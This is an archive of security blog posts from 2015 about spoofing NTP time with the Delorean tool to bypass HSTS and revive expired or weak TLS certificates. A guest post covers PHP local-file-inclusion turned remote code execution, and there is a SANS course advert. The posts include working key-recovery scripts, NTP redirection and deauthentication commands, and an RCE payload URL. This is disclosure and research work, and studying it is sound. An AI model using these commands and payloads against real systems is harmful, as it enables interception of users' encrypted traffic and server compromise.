Wednesday, 4 November 2015

Attacking the Public Key Infrastructure

Have a look at the other posts in this series:

[7] Other Attacks
[8] Helper tools

Disclaimer: All this information has been obtained from empirical tests performed at a specific point in time, so things may have changed since then.

Disclaimer (2): In this post I talk about certificates, SSL keys, etc. Please note that I may say (for example) "the certificate's private key" because that's the way I usually speak, even though it probably isn't the most correct term. Strictly speaking, I should say "the private key corresponding to the certificate's public key", but I think it's easier to understand if we simplify. Anyway, if something sounds confusing, just drop me an email or a comment and I'll try to clarify it.

Of all the attacks that I tried using Delorean, this was my favorite one. While I was thinking about what could go wrong when the clock can be tampered with, SSL certificate expiration dates came to my mind.

As you probably know, an SSL certificate is valid if:
  • It was issued by a trusted certification authority (CA) or by an intermediate CA that chains up to a trusted CA.
  • Its common name matches the server's hostname (wildcards can be used).
  • The current date is between the "Not valid before" and "Not valid after" dates.
When an SSL certificate expires, we need to get a new one, and the old one is usually forgotten, because it no longer meets the third condition. However, with Delorean this isn't completely true, since we can tamper with the internal clock and make a computer believe that an old certificate is still valid.
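
To illustrate that third condition, here is a hedged sketch using openssl (the file names are hypothetical): the first command prints the validity window of an old certificate, and the second asks a reasonably recent OpenSSL to verify the chain as if the clock were set to a date inside that window, which is exactly what Delorean does to the victim's machine.

$ openssl x509 -in old_cert.pem -noout -subject -dates
$ openssl verify -CAfile old_chain.pem old_cert.pem
# fails with "certificate has expired"
$ openssl verify -attime $(date -d '2010-06-01' +%s) -CAfile old_chain.pem old_cert.pem
# succeeds, because the chain is checked against the supplied timestamp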


But we can't attack every old certificate in the world using Delorean. We need to find certificates that meet the following conditions:
  • We need to be able to reconstruct the old certificate chain: This isn't usually a problem, since CA certificates have long validity periods, so the current certificate chain may also work with the old certificate, and if not, searching the Internet for the "Issuer name" usually works.
  • The root CA (the one that starts the certificate chain) has to be a trusted OS/browser CA: If the root CA has expired and been removed from the browser's certificate database, the victim's browser won't be able to validate the certificate chain. This is only a problem for root CAs; any intermediate CA could be expired and that wouldn't prevent our attack.
  • We need to find the old host certificate: This is harder than it seems. Let's talk about it a few lines below.
  • We need to be able to get the host certificate's private key: This is the only private key that we need to know. That's why we're interested in old certificates: there are much easier ways to get the private key than with modern ones. Let's talk about this a few lines below as well.
So... we said that we need to get old SSL host certificates. Where could we find them? Unfortunately, I didn't grab SSL certificates 10 years ago, so I needed to find somebody else on the Internet who did. I spent a lot of time looking for this kind of database (the older the better, of course) and the best and oldest resource that I found was the SSL Observatory from the EFF. They crawled the Internet in 2010 and stored a huge database with all the SSL certificates that they found.


Now that we have an old SSL certificate database, we can start looking for certificates that we think we could break in order to get their private keys. For example, something that came to my mind was the FREAK attack. As part of that attack, researchers cracked RSA-512 keys in a few hours using a big Amazon EC2 cluster, so we could do something similar if we find RSA-512 certificates in our database.
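
As a hedged illustration of that search (the file layout is hypothetical; the Observatory data is actually distributed as a database dump), this is the kind of loop I mean: print each certificate's key size with openssl and keep the ones at 512 bits or below.

# one PEM certificate per file, previously extracted from the dump
for CERT in observatory/*.pem
do
    BITS=$(openssl x509 -in "$CERT" -noout -text | awk '/Public-Key:/ {gsub(/[^0-9]/,""); print; exit}')
    if [ -n "$BITS" ] && [ "$BITS" -le 512 ]
    then
        echo "$BITS bits: $CERT"
    fi
done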

Unfortunately, the most interesting targets (Google, Facebook, etc.) didn't use RSA-512 in 2010. Maybe if we had an older database... Anyway, I was able to find some interesting certificates and some funny ones, such as a Disney site (not the main site).

Disclaimer (3): When I do a Delorean demo using a website, I'm NOT attacking the website. The website is NOT vulnerable. I'm attacking a vulnerable client, which is my own testing machine, so I'm attacking myself, not the website.

I'm not going to describe step by step how I cracked the RSA-512 certificate, because that would be a post (or several) in itself, and because it was the first time I did it, so you can find much more useful information on the Internet [1][2][3][4]. At the end of the day, I had four EC2 machines running for 3 days (as far as I remember) and it cost around $150 in total.


Once you have factored the old RSA key, you have the two prime numbers that were used to create the public and private keys, so you just need to run the key generation again (private-from-pq.c) to get the private key. Let's see if it works or not.
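
A quick sanity check at this point (just a sketch; old_cert.pem and recovered.pem are hypothetical names): the modulus of the certificate and the modulus of the reconstructed private key must be identical, so hashing both is an easy way to compare them.

$ openssl x509 -in old_cert.pem -noout -modulus | openssl md5
$ openssl rsa -in recovered.pem -noout -modulus | openssl md5
# if both MD5 values match, the recovered private key belongs to the certificate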


It works! The certificate chain is valid again and we have the private key, so we can fool the browser and impersonate the website. Cool!
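
For a quick local test (again a sketch, not the full MitM setup; the file names and port are made up), openssl's built-in test server can serve the old certificate with the recovered key. Pointing a victim at it while shifting their clock with Delorean is essentially what the demo does.

$ openssl s_server -accept 4433 -cert old_cert.pem -key recovered.pem -www
# depending on the OpenSSL version you may also need to supply the old
# intermediate certificates so the browser can rebuild the full chain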

As far as I have read (I'm not an expert in this field), governments and other organizations with enough resources could crack RSA-1024 in a reasonable time. This is even more interesting than my demo, because RSA-512 is now banned from most modern browsers, so they would reject the certificate chain. I did this demo using an RSA-512 certificate because I don't currently have enough resources to crack RSA-1024, and because it's exactly the same process, so if we can do this for RSA-512 in a slightly old browser, we could definitely do it for RSA-1024 if we had enough cracking power.

This is not the only old weakness that we can use: others include certificates compromised in server hacks, certificates affected by Heartbleed, certificates generated with the vulnerable Debian PRNG, and so on. But there's something that probably came to your mind: what about certificate revocation? This isn't a problem with cracked certificates, because they were never revoked, but all those other certificates should have been revoked after a new one was generated.


A Certificate Revocation List (CRL) is the database where all the revoked certificates are stored. Browsers download it (or request the information via online services) and check whether a given certificate has been revoked. If it has, they reject the communication even if the whole certificate chain is valid.

When I was facing this problem, the question that came to my mind was: do those CRLs store ALL the revoked certificates, from the beginning of time? That would make these files HUGE, which could affect performance. Well, I can't be 100% sure about this, but I did some quick tests to check whether CAs purge from their CRLs the revoked certificates that are already outside their validity period.


I focused on one simple test. I opened several well-known websites in my browser and got their issuer certificates. Then I downloaded the referenced CRLs and looked for a big gap between the date when the certificate was issued and the date of the oldest revoked certificate. If the certificate was issued in 2008, but the first certificate in the CRL was revoked in 2012 and the second one in 2014... that's pretty weird. My humble opinion is that those CAs are purging expired certificates because they would be invalid anyway. That's 100% true, but it lets us use our attack against those certificates, even though they should be revoked.
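
This is roughly how such a check looks from the command line (the URL and file names are placeholders): read the CRL distribution point from the certificate, download the CRL, and look at the oldest "Revocation Date" entries.

$ openssl x509 -in cert.pem -noout -text | grep -A2 'CRL Distribution'
$ wget -q http://crl.example-ca.com/ca.crl
# use "-inform PEM" below if the CA publishes the CRL in PEM format
$ openssl crl -inform DER -in ca.crl -noout -text | grep 'Revocation Date' | head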

Online Certificate Status Protocol (OCSP) doesn't really help (it's even easier to bypass), because most browsers are configured to accept certificates when they can't validate them, so an attacker just needs to drop the OCSP connections. More information HERE.
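
For completeness, a hedged example of a manual OCSP query (placeholder file names; the responder URL can be read from the certificate itself). If an attacker simply drops this traffic, most browsers fail open and accept the certificate anyway.

$ openssl x509 -in cert.pem -noout -ocsp_uri
# prints the responder URL, e.g. http://ocsp.example-ca.com (hypothetical)
$ openssl ocsp -issuer issuer.pem -cert cert.pem -url http://ocsp.example-ca.com -resp_text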

From the list above, I looked for certificates that were generated using the old Debian PRNG bug. The problem was that this bug dates from 2008 and the SSL database that we have is from 2010, so most interesting websites had changed their certificates before 2010.

Looking around the Internet I found CodeFromThe70s. They developed a Firefox extension that detected certificates generated with the Debian PRNG bug. Detections were sent back to them, so they have a nice blacklist on their website. I used that list to find a certificate that I could use to test whether it was still revoked or not.

The next step was to get the private key. This wasn't as fast as I thought, because the pre-generated lists published by HD Moore were for SSH keys only, so I needed to generate my own for HTTPS. What I did was to use the original patched "getpid.so" library and the "ubunturoot" chrooted environment (the original link was broken, so I downloaded it from here), and I developed a couple of shell scripts that just generate all the possible SSL key pairs and check whether each one is the key I'm looking for:

$ cat keyfind.sh
#!/bin/bash

# MD5 of the modulus of the public key we are looking for
TARGET=0123456789abcdef0123456789abcdef

# the Debian PRNG only depended on the process ID, so there are just 32768 candidate keys
for PID in `seq 1 32768`
do
    # generate the candidate key pair inside the vulnerable chrooted environment
    chroot . /generate.sh $PID &>/dev/null

    # compare the MD5 of the candidate modulus against the target one
    openssl rsa -in private.pem -noout -modulus | openssl md5 | awk '{print $2}' | grep "$TARGET"
    if [ $? -eq 0 ]
    then
        cp private.pem found.pem
        echo "FOUND!"
        exit
    fi
    rm -f private.pem
    echo $PID
done


$ cat generate.sh
#!/bin/bash

# getpid.so makes getpid() return MAGICPID, so the vulnerable OpenSSL inside
# the chroot generates the key pair that corresponds to that process ID
export MAGICPID=$1
export LD_PRELOAD=/getpid.so
/usr/bin/openssl genrsa -out private.pem 1024 &>/dev/null


It took a few hours, but I was able to get this private key as well. Maybe it wasn't the most efficient way, but it worked for me. The resulting demo follows:


My DEF CON talk (August 7th, 2015) is online, so you can have a look at it as well. I also presented this in Spanish at RootedCON (March 2015) and NavajaNegra/ConectaCON (October 2015), but they haven't published the videos yet:

Monday, 2 November 2015

Attacking HTTP Strict Transport Security

Have a look at the other posts in this series:

[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Disclaimer: All this information has been obtained from empirical tests performed at a specific point in time, so things may have changed since then.

In the last few posts we have reviewed how time synchronization works in different operating systems and how we can change the clock using Delorean in each of them. However, we haven't seen any practical attack yet. What can we do by tampering with a computer's clock?

I started this research because I was doing a MitM demo using SSLStrip, and it didn't work when I tried to visit Gmail and other well-known websites. That was weird, because I had done the same demo many times in the past. While debugging the problem I discovered an HTTP header called "Strict-Transport-Security", something I had never seen before.


HTTP Strict Transport Security (aka HSTS) is a security protection that was released in 2012 and, although it is not widely used across the Internet yet, most well-known providers use it at this moment. The server part is really simple: a webserver just needs to send the "Strict-Transport-Security" header, setting the desired policy with the "max-age" and "includeSubdomains" parameters. In the example above, the web server sets a policy in the browser saying "hey! no matter what happens, please always connect to me using HTTPS for the following 3153600 seconds".
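
You can easily see the header from the command line (the hostname is just an example, and the exact max-age value varies per site):

$ curl -sI https://www.example.com/ | grep -i strict-transport-security
# e.g.: Strict-Transport-Security: max-age=31536000; includeSubDomains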

The hardest part of HSTS is on the browser side. A browser needs to read this header and take all the necessary actions to ensure that the policy is followed. Most browsers support HSTS, although IE didn't support it until June 9th, 2015. While I was delivering my talk at DEF CON (August 2015), an attendee in the first row corrected me when I said "IE doesn't support HSTS". He was right, because I'm not an IE user and I had last tested it a few months before the talk. I asked him if this was something recent and he told me "six months ago" (around February), which isn't exactly what I have found documented. Anyway, it supports HSTS now.


In addition, Google and Mozilla created a preloaded HSTS list for their browsers (the idea was later adopted by other browsers). A preloaded list is a list of well-known providers (Google, Twitter, Facebook, PayPal, etc.) where HSTS is "enforced by default". The goal of this preloaded list is to avoid the security gap when a user has just installed his browser or cleaned its cache, or when he visits a website for the first time, before any HSTS policy has been set.


Although the information from Google and Mozilla seems to describe the HSTS preloaded list as a static list, the truth is that preloaded entries are treated exactly the same as dynamic entries. When a browser is installed or its cache is cleaned, all the entries in this list are added as dynamic entries with a default value (10 weeks), and they're updated in the same way as dynamic entries, so in real life it doesn't make a difference for Delorean.


The only browser that I have found in my research which works in a different way is Apple Safari. It stores the preloaded list in a .plist file and always enforces HSTS for those hosts, no matter what the local clock says.

Since the HSTS policy prevents us from intercepting the first HTTP connection and, as a consequence, from using SSLStrip (or intercepting the communication in any other way) for the number of seconds specified in the "max-age" parameter, our attack against HSTS is based on updating the local clock in order to make the HSTS cache expire. When there isn't any entry in the HSTS cache, the browser works as usual, so when the user types a hostname such as "mail.google.com" it will connect over HTTP before being redirected to HTTPS.
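
As a rough sketch of the lab setup (the port and the MitM technique are up to you): answer the victim's NTP queries with Delorean so the HSTS entries expire, then run SSLStrip as usual against the first plain-HTTP request.

# run on the attacker machine, after redirecting the victim's NTP (udp/123)
# and HTTP (tcp/80) traffic to it (ARP spoofing, rogue AP, etc.)
./delorean.py -n     # answers NTP queries with a date more than 1000 days ahead
sslstrip -l 8080     # usual SSLStrip listener for the stripped HTTP traffic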


My talk at BlackHat Europe last year was based on this attack, and it was published several months ago, so you can have a look if my accent doesn't hurt you (as a comment on YouTube said) ;)

Friday, 30 October 2015

Microsoft Time Synchronization

Have a look at the other posts in this series:

[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Of course, I couldn't finish my examples without talking about Microsoft. Of the desktop OS vendors that I have tested, Microsoft has the most robust time synchronization in terms of security. It works differently on standalone computers and on domain members, so let's cover both cases:

On a standalone Windows box, time synchronization takes place every 7 days (Sundays at around 1-2am), so the only option to intercept an NTP request is to be there on Sunday, or whenever the victim boots the computer for the first time after the scheduled synchronization. In addition, Windows has a clock drift limitation of 15 hours, so we can't change the clock by more than 15 hours on each synchronization, which is a real problem for most of the attacks that we will see in the following posts.

The 15-hour value is not hardcoded; it is stored in the registry, in a couple of keys called "MaxPosPhaseCorrection" and "MaxNegPhaseCorrection", and it varies between systems: for example, on Windows 7/8 it is 15 hours but on Windows Server 2012 it is 48 hours, and on older servers it is different as well. It can also change when certain changes happen on the box, for example when it becomes a domain member.
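
You can check the values configured on a given box from an administrative prompt (this is the standard w32time registry location; the values are expressed in seconds, so 15 hours shows up as 0xd2f0 = 54000):

C:\> reg query HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Config /v MaxPosPhaseCorrection
C:\> reg query HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Config /v MaxNegPhaseCorrection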


Together, both controls make Windows boxes pretty secure in terms of time synchronization. However, if either of them is changed by the user, there are some attack vectors that could be used. For example, there are many tutorials on the Internet explaining how to change the time synchronization scheduled task, because people think (and they're probably right) that once a week is not enough for good clock accuracy.


So, under those circumstances, a new attack vector came to my mind: what happens if the user configures his system to synchronize the time more often than the maximum clock drift allowed? The answer is that an attacker could intercept that NTP request and move the clock to just a few seconds before the next scheduled time synchronization, then intercept the following NTP request and do the same, and again, and again, until reaching the desired date. I called this attack "Time Skimming", because the idea is similar to a stone skimming across a lake, and it's implemented in Delorean:
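
To get a feeling for the numbers (a back-of-the-envelope calculation, nothing more): reaching the ~1000-day jump that the HSTS and PKI attacks need, in hops limited to 15 hours each, takes around 1600 intercepted synchronizations, which is only practical because each fake reply lands the clock just before the next scheduled synchronization, so the hops can be chained within a short period of real time.

$ echo $(( 1000 * 24 / 15 ))
1600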



There's another way to force a time synchronization, but it requires some kind of social engineering: getting the user to manually request a synchronization from the "Internet Time Settings" dialog. It's not as easy as on Mac OS X, since it takes several clicks.

Domain members work in a different way. The Max[Pos|Neg]PhaseCorrection value is set to 0xFFFFFFFF, which means "accept any clock drift". That would be a risk, but responses include a packet signature in order to authenticate their source:


They use the NTP standard in a creative way. The Key ID should be a value that identifies which key has to be used to sign the response. In a regular NTP exchange it would be 1 or 2, depending on the number of keys available. However, what Microsoft did was use this field to identify the computer account in Active Directory that is requesting the time synchronization. For example, if we see a Key ID of 0x5e040000 we need to change its endianness, which gives us 0x0000045e. The first bit of this value is a key selector (0 or 1), and the rest is the Relative ID (RID) of the computer account.
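
A hedged sketch of that decoding (the sample Key ID is the one from the text; treating the most significant bit as the key selector is my reading of the observed traffic):

$ KEYID=0x5e040000
$ SWAPPED=$(( ((KEYID & 0xFF) << 24) | ((KEYID & 0xFF00) << 8) | ((KEYID >> 8) & 0xFF00) | ((KEYID >> 24) & 0xFF) ))
$ printf 'key selector=%d  RID=%d (0x%x)\n' $(( SWAPPED >> 31 )) $(( SWAPPED & 0x7FFFFFFF )) $(( SWAPPED & 0x7FFFFFFF ))
key selector=0  RID=1118 (0x45e)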


As you probably know, both computers and users are objects in Active Directory; computers are just a special kind of user. A password is set for this account when the computer joins the domain, and those passwords are changed on a regular basis. A Domain Controller stores the last two known hashed passwords, and the key selector that we mentioned before identifies which of them is being used.

/* Sign the NTP response with the unicodePwd */
MD5Init(&ctx);
MD5Update(&ctx, nt_hash->hash, sizeof(nt_hash->hash));
MD5Update(&ctx, sign_request.packet_to_sign.data, sign_request.packet_to_sign.length);
MD5Final(signed_reply.signed_packet.data + sign_request.packet_to_sign.length + 4, &ctx);


Response packets are signed using MD5 ( md5(hashed_password + response_body) ), which is not the most robust hashing algorithm in the world, but I couldn't find a working attack for such a small message, so at this point I think Microsoft domain time synchronization is the most robust mechanism that I have seen in my research.

Wednesday, 28 October 2015

Fedora / Ubuntu Time Synchronization

Have a look at the other posts in this series:

[4] Microsoft Time Synchronization
[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Yesterday we talked about how time synchronization works in Mac OS X, and how it differs between pre-Mavericks versions and the most modern ones. Today we are having a look at GNU/Linux. Of course, there is a huge number of Linux flavors available and we can't review all of them, so I chose the two flavors that I think are most widespread among desktop users (Ubuntu and Fedora), since they would be the targets for these attacks.

Disclaimer: All this information has been obtained from empirical tests performed at a specific point in time, so things may have changed since then.

Ubuntu Linux is the only reviewed system that doesn't synchronize the time on a regular basis, so it isn't just a matter of waiting the necessary amount of time and intercepting the NTP request. In Ubuntu, time synchronization is done every time a network interface comes up (and, of course, when the system boots). This is easy to see if we have a look at the scripts that Ubuntu runs when that happens:

$ ls /etc/network/if-up.d/
000resolvconf  avahi-daemon  ntpdate  wpasupplicant
avahi-autoipd  ethtool       upstart

There isn't any restriction on big date changes, so we can easily intercept this request and set the computer's clock using Delorean. There are two possible scenarios: intercept at boot time or when the computer connects to a network, or simply detach the computer from the network (a Wi-Fi deauth, for example) and wait for the next connection.
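
For the Wi-Fi scenario, a hedged sketch (the MAC addresses and interface name are made up): kick the victim off the network so that the interface comes up again and triggers the if-up.d ntpdate run, then answer that request with Delorean.

# aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# ./delorean.py -n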

On the other hand, Fedora Linux uses a similar approach to Mac OS X. In previous versions, it just synchronized the time every minute, without any security restrictions, so it was easy and fast to use Delorean to tamper with the system clock:

$ tcpdump -i eth0 -nn src port 123
12:43:50.614191 IP 192.168.1.101.123 > 89.248.106.98.123: NTPv3, Client, length 48
12:44:55.696390 IP 192.168.1.101.123 > 213.194.159.3.123: NTPv3, Client, length 48
12:45:59.034059 IP 192.168.1.101.123 > 89.248.106.98.123: NTPv3, Client, length 48

At some point they changed the synchronization approach. Nowadays there is a daemon called "chrony" which works in a similar way to "pacemaker" in Mac OS X. However, chrony is configured in a more secure way than pacemaker: by default, it doesn't accept big date changes. It only accepts them in the first three updates after a reboot, so we can still use a Delorean attack at boot time or if we can crash the chrony service.
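
That behavior comes from the makestep directive in the default chrony configuration (quoted from memory, so double-check your own /etc/chrony.conf):

# excerpt from a default Fedora /etc/chrony.conf (from memory):
# the clock may be stepped only if the offset is larger than 1 second,
# and only during the first 3 clock updates after chronyd starts
makestep 1.0 3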

We're probably going too fast, because we haven't talked yet about HSTS and how it can be bypassed using time synchronization attacks, but let me show you an example of this attack against an Ubuntu Linux box:

Tuesday, 27 October 2015

Mac OS X Time Synchronization

Have a look at the other posts in this series:

[4] Microsoft Time Synchronization
[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Last week we showed how Delorean works and how we can use it to tamper with NTP responses. However, time synchronization works slightly differently from one OS vendor to another.

Disclaimer: All this information has been obtained from empirical tests performed at a specific point in time, so things may have changed since then.

Pre-Mavericks Mac OS X uses a simple time synchronization approach. An ntpd daemon is running and the time is synchronized every 9 minutes. No restrictions or special security configuration are applied to this daemon, so an attacker can use Delorean and change the internal clock easily.

$ tcpdump -i eth0 -nn src port 123
09:02:18.166708 IP 192.168.1.100.123 > 17.72.148.53.123: NTPv4, Client, length 48
09:11:20.059792 IP 192.168.1.100.123 > 17.72.148.53.123: NTPv4, Client, length 48
09:20:17.951361 IP 192.168.1.100.123 > 17.72.148.53.123: NTPv4, Client, length 48


However, Apple changed the time synchronization mechanism in Mavericks. ntpd is still running, but it doesn't change the clock directly. The time drift is stored in /var/db/ntp.drift, and there is another service, called "pacemaker", that checks this file and changes the clock if needed.
This new service has several benefits. For example, it adapts the number of NTP requests to the power state (plugged in or on battery). Another important difference is that clock changes are not applied in a single step: the clock speeds up or slows down in order to correct the date while avoiding big time jumps. It doesn't implement any other security feature, so it can be intercepted using Delorean as well.

Although it shouldn't be a problem, we found that ntpd wasn't working properly in modern versions of Mac OS X, so time synchronization was not working at all. There are some people discussing this on the Internet. Does this mean that modern Mac OS X versions are not vulnerable to a Delorean attack? The answer is NO. Let's have a look at the /usr/libexec/ntpd-wrapper script:


As you can see above, Mac OS X runs an sntp (simple NTP) command at boot, before starting the ntpd daemon. This sntp binary is not affected by the same bug, so we can intercept this synchronization and run a Delorean attack when a Mac OS X box boots up.

There is still an additional way to exploit this weak time synchronization in Mac OS X: when a user opens the "Date & Time Preferences" menu, the operating system automatically synchronizes the time without the user's knowledge, so we can use Delorean in this scenario as well.


In the following posts, we will see how we can exploit this in order to intercept SSL communications, as we presented at DEF CON recently.

Wednesday, 21 October 2015

NTP MitM Attack using a Delorean

Around a year and a half ago, I started researching how computers synchronize their internal clocks, and how this could be used to attack well-known protocols and services running on top of the operating system. As a result, I have presented my findings at several security conferences such as BlackHat Europe 2014, RootedCON 2015 (Spanish), DEF CON 23 and Navaja Negra / ConectaCON 2015 (Spanish).


Today, October 21st 2015, is the date when Marty McFly went to the future in the second part of the amazing Back to the Future saga, so I can't think of a better date to start releasing all the details of this research.

[4] Microsoft Time Synchronization
[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

As we will see in the upcoming posts, all the OS vendors that I have tested use the Network Time Protocol (NTP) to keep their internal clocks accurate, which is very important for some authentication protocols and other features. Most of them don't deploy this service in a secure way, making it vulnerable to man-in-the-middle attacks.
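
As a hedged example of what that means in practice: once the victim's traffic already flows through our machine (ARP spoofing, rogue gateway, etc.), a single firewall rule is enough to divert every NTP query to a local fake server such as Delorean.

# iptables -t nat -A PREROUTING -p udp --dport 123 -j REDIRECT --to-ports 123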

In order to exploit this issue, I developed a tool called DELOREAN. Delorean is an NTP server written in Python, open source and available on GitHub (contributions are welcome). I borrowed a few lines of code from kimifly's ntpserver and, of course, all the credits to him have been included.

What makes Delorean different and useful for us is that we can use its flags to make it behave differently from a regular NTP server. Basically, we can configure it to send fake responses, similarly to Metasploit's fakedns module.

$ ./delorean.py -h
Usage: delorean.py [options]

Options:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface=INTERFACE
                        Listening interface
  -p PORT, --port=PORT  Listening port
  -n, --nobanner        Not show Delorean banner
  -s STEP, --force-step=STEP
                        Force the time step: 3m (minutes), 4d (days), 1M (month)
  -d DATE, --force-date=DATE
                        Force the date: YYYY-MM-DD hh:mm[:ss]
  -x, --random-date     Use random date each time


We have the typical interface (-i) and port (-p) flags, which help us bind the service exactly where we want. The -n flag just hides the super-cool Delorean banner :)

                                    _._                                          
                               _.-="_-         _                                 
                          _.-="   _-          | ||"""""""---._______     __..    
              ___.===""""-.______-,,,,,,,,,,,,`-''----" """""       """""  __'   
       __.--""     __        ,'                   o \           __        [__|   
  __-""=======.--""  ""--.=================================.--""  ""--.=======:  
 ]       [w] : /        \ : |========================|    : /        \ :  [w] :  
 V___________:|          |: |========================|    :|          |:   _-"   
  V__________: \        / :_|=======================/_____: \        / :__-"     
  -----------'  ""____""  `-------------------------------'  ""____""  

We can use Delorean in several modes, but we are going to focus on the most useful ones. There are some other attacks that turned out not to be that interesting after developing them, but they are still in the code. Perhaps I will remove them in the future, since they require scapy and some other dependencies.

Since it's too soon to talk about how each OS synchronizes, we will test how Delorean works using the command-line tool "ntpdate":

$ ntpdate -q 192.168.1.2
server 192.168.1.2, stratum 2, offset 97372804.086845, delay 0.02699
20 Oct 06:05:45 ntpdate[881]: step time server 192.168.1.2 offset 97372804.086845 sec


By default (no flags), Delorean responds with a date that matches the same weekday and day of the month as the current date, but at least 1000 days in the future. This is useful for the HSTS bypass, as we will see in upcoming posts.

# ./delorean.py -n
[19:44:42] Sent to 192.168.10.113:123 - Going to the future! 2018-08-31 19:44
[19:45:18] Sent to 192.168.10.113:123 - Going to the future! 2018-08-31 19:45


We can set a jump relative to the current date using the step flag (-s). Relative jumps can be defined as 10d (ten days in the future), -2y (two years in the past), etc.:

# ./delorean.py -s 10d -n
[19:46:09] Sent to 192.168.10.113:123 - Going to the future! 2015-08-10 19:46
[19:47:19] Sent to 192.168.10.113:123 - Going to the future! 2015-08-10 19:47


We can also set a specific date, and Delorean will always answer with that same date:

# ./delorean.py -d '2020-08-01 21:15' -n
[19:49:50] Sent to 127.0.0.1:48473 - Going to the future! 2020-08-01 21:15
[19:50:10] Sent to 127.0.0.1:52406 - Going to the future! 2020-08-01 21:15


There is an additional attack called the "Skimming Attack" which is only useful with certain configurations. We will go into it in depth when we talk about Microsoft synchronization, although it could be useful on other platforms as well.

Tuesday, 8 September 2015

SANS SEC-660: "Advanced Penetration Testing, Exploit Writing and Ethical Hacking" in Madrid

As you probably know, I have been quite involved with the SANS Institute since 2010, when I was a SANS Mentor for the first time. Currently I'm a SANS Community Instructor and I have taught SEC-560: "Network Penetration Testing, Exploits and Ethical Hacking" several times in Spain.


Next November in Madrid (Spain), you will have the opportunity to step up your penetration testing skills to fields and techniques not covered in the SEC-560 course. As you can read on the SANS Institute website, SEC-660: "Advanced Penetration Testing, Exploit Writing and Ethical Hacking" is designed as a logical progression point for those who have completed SANS SEC-560, or for those with existing penetration testing experience. The topics covered in this course include attacks against network access control (NAC), virtual local area network (VLAN) manipulation, breaking out of Windows and Linux restricted environments (kiosk-like), cryptographic attacks, fuzzing, exploit writing, bypassing the most common OS protections such as ASLR, DEP and canaries, and much more.


Although it is not a course focused on exploit writing like SEC-760, the exploiting part of SEC-660 (two days) is the perfect approach for those pentesters who want an in-depth view of how processes and memory are managed in Windows and Linux, and of how to exploit certain common flaws, which can be really useful when there isn't a public exploit available or when it doesn't work properly in our specific environment.

In addition, even for those used to the "SANS style", SEC-660 is one of the most hands-on courses that I have ever seen. There are dozens of real-world attacks, covered in detail, that you will probably find in your upcoming penetration tests.

Interested? Book the following dates: November 2nd-7th in Madrid. You just need to drop me an email at jselvi{-at-}pentester.es and CC sans{-at-}one-esecurity.com, and we will explain how to proceed. Remember that the course materials are in English, but the classes will be delivered in Spanish.

Shall we dance Pentest?

More information about SEC-660 HERE.
More information about other courses and prices HERE.

Friday, 20 February 2015

From Case-Insensitive to RCE

This post was written by The DarkRaver. He's a close friend and one of the most skilled security professionals that I have ever met. He's also known for publishing tools such as dirb or sqlibf, which I strongly recommend.

Go ahead with his post:

------------------------------------------------------

Some time ago, I was doing a webapp penetration test when I found something really interesting. The application was written in PHP and it relied on some commercial components. Soon I found lots of XSS- and SQLi-vulnerable forms, but we won't focus on that in this post.

Suddenly, I realised that requesting the same page in uppercase or lowercase changed its behavior. The webserver was based on Apache and Linux (case sensitive) but the files seemed to be hosted on a case-insensitive filesystem (maybe a NAS share?), so when I requested page.php it responded as expected, but when I requested page.PHP its source code was shown.


That vulnerability allowed me to review the commercial application's source code, where I found several potentially dangerous functions such as "include()" and "include_once()" that could be vulnerable. No other dangerous functions such as "system()", "open()" or "file_get_contents()" were found.

A few minutes later I was able to confirm that at least one of those "include_once()" calls was vulnerable to LFI and exploitable. However, only files with a .js extension could be loaded.


I tried several ways to bypass this restriction, such as null bytes, long paths, etc., but nothing seemed to work. So... we're stuck with that. How could we upload or create a .js file on the local filesystem?

The upload forms didn't allow that kind of extension and we weren't able to create files on the server. Or... maybe we were? What about the following piece of code?


It was a feature that allowed JavaScript files to be cached on disk! But... how could we inject custom content into those cached files?

An in-depth look showed that some JavaScript files were generated from a template, and one of them included some user-controlled parameters. That sounds great!


Even better, the injectable parameter was the same one that was vulnerable to LFI, so we could find a way to exploit both vulnerabilities at the same time.

JavaScript files were stored in a path like this: "/cache/".$offv.$theme.$lang.$type.$name.".js", where $offv was the user-provided input and the other parts could be easily guessed by looking at the source code. So... the exploit string should be as follows:

http://www.app.com/plugin/minjs.php?
offending_var=../../cache/<?phpinfo();?>defaultes-lacoredefault

However, I got a "500 - Internal Server Error". What the hell??? Something was crashing badly. How could we fix it? I tried some other PHP functions such as "system()", "file_get_contents()" and "phpversion()", but most of them crashed in the same way.

Wait, what if the exploit works but something crashes at some point after that? What if we try to "exit()" the execution?

http://www.app.com/plugin/minjs.php?
offending_var=../../cache/<?system("id");exit();?>defaultes-lacoredefault
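
If you prefer to send it from the command line, the same request looks like this once URL-encoded (the host and parameter names are the placeholders used throughout this post):

$ curl 'http://www.app.com/plugin/minjs.php?offending_var=../../cache/%3C%3Fsystem(%22id%22)%3Bexit()%3B%3F%3Edefaultes-lacoredefault'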


It worked! I finally had remote code execution on the server, and everything began with a small source code leak caused by a case-insensitive filesystem. Small things sometimes cause big trouble.

Thursday, 5 February 2015

An IE Same Origin Policy Bypass story

A couple of days ago I was reading my feeds when a headline caught my attention: "Serious bug in fully patched Internet Explorer put user credentials at risk". A same-origin-policy bypass in Internet Explorer had been released. This is a really critical kind of vulnerability, because the SOP provides isolation between different websites inside our browser and prevents evil sites from getting access to other sites, modifying their content and so on.

I have been taking a look at it for the last few hours and it definitely works. The provided PoC works, but perhaps it isn't the most practical approach. As far as I know, details of this vulnerability haven't been published apart from the PoC itself, so let's have a look at it. I have prepared my own PoC, just to see whether I could use this vulnerability for more evil purposes.


At first sight, the vulnerability seems to be a race condition or something similar. There are two iframes; the first one loads a dynamic webpage, for example 1.php. Its source code wasn't published with the PoC, but it simply waits for a few seconds and then redirects to the same URL as the second iframe.

Both iframes load a webpage on the target website. It's important to find a page that can be loaded inside an iframe, because otherwise the vulnerability isn't exploitable. Providers such as Google, Facebook, etc. usually configure their sites with the "X-Frame-Options" header in order to avoid clickjacking attacks.


